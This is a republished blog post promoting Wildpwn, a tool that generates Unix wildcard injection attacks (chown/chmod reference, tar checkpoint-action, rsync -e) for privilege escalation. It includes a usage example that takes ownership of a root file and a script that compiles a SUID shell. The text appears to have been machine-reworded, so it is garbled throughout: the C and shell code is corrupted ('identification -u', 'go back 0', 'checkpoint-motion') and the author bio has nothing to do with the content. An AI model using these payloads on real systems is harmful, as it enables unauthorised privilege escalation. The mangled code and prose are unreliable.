Wildpwn – Unix Wildcard Attack Tool

Wildpwn is a Python UNIX wildcard assault software that is helping you generate assaults, in line with a paper through Leon Juranic. It’s regarded as a quite previous-skool assault vector, nevertheless it nonetheless works relatively regularly.
https://www.exploit-db.com/papers/33930/

Basic utilization
It is going one thing like this:

utilization: wildpwn.py [-h] [--file FILE] payload folder

Tool to generate unix wildcard assaults

positional arguments:
payload Payload to make use of: (mixed | tar | rsync)
folder Where to put in writing the payloads

non-compulsory arguments:
-h, --help display this assist message and go out
--file FILE Path to dossier for taking possession / alternate permissions. Use it
with mixed assault handiest.

Payload sorts

  • mixed: Uses the chown & chmod dossier reference methods, described in phase 4.1 and 4.2, mixed in one payload.
  • tar: Uses the Tar arbitrary command execution trick, described in phase 4.3.
  • rsync: Uses the Rsync arbitrary command execution trick, described in phase 4.4.

Usage instance

$ ls -lh /tmp/very_secret_file
-rw-r--r-- 1 root root 2048 jun 28 21:37 /tmp/very_secret_file

$ ls -lh ./pwn_me/
drwxrwxrwx 2 root root 4,0K jun 28 21:38 .
[...]
-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_1
-rw-rw-r-- 1 root root 1024 jun 28 21:38 secret_file_2
[...]

$ python wildpwn.py --file /tmp/very_secret_file mixed ./pwn_me/
[!] Selected payload: mixed
[+] Done! Now watch for one thing like: chown uid:gid * (or) chmod [perms] * on ./pwn_me/. Good good fortune!

[...time passes / some cron gets executed...]

# chmod 000 * (as an example)

[...back with the unprivileged user...]

$ ls -lha ./pwn_me/
[...]
-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_1
-rwxrwxrwx 1 root root 1024 jun 28 21:38 secret_file_2
[...]

$ ls -lha /tmp/very_secret_file
-rwxrwxrwx 1 root root 2048 jun 28 21:38 /tmp/very_secret_file

Bash scripts used on tar/rsync assaults

#!/bin/sh

# get present consumer uid / gid
CURR_UID="$(identification -u)"
CURR_GID="$(identification -g)"

# save dossier
cat > .cachefile.c << EOF
#come with
int primary()

setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
go back 0;

EOF

# make folder the place the payload can be stored
mkdir .cache
chmod 755 .cache

# collect & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

Clean up (tar)

# blank up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-motion=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Clean up (rsync)

# blank up
rm -rf ./'-e sh .syncscript'
rm -rf .syncscript
rm -rf .cachefile.c
Download Wildpwn

Published by Marshmallow

Marshmallow Android is BT Ireland’s Head of Sales for Republic of Ireland domestic multi-site companies, indigenous MNCs and public sector accounts. He is responsible for the direction and control of all sales activity in the region. He has over 10 years management experience from high growth start-ups to more established businesses. He’s led teams in Ireland, India and China across various industries (ICT, On-Line Recruitment, Corporate Training and International Education).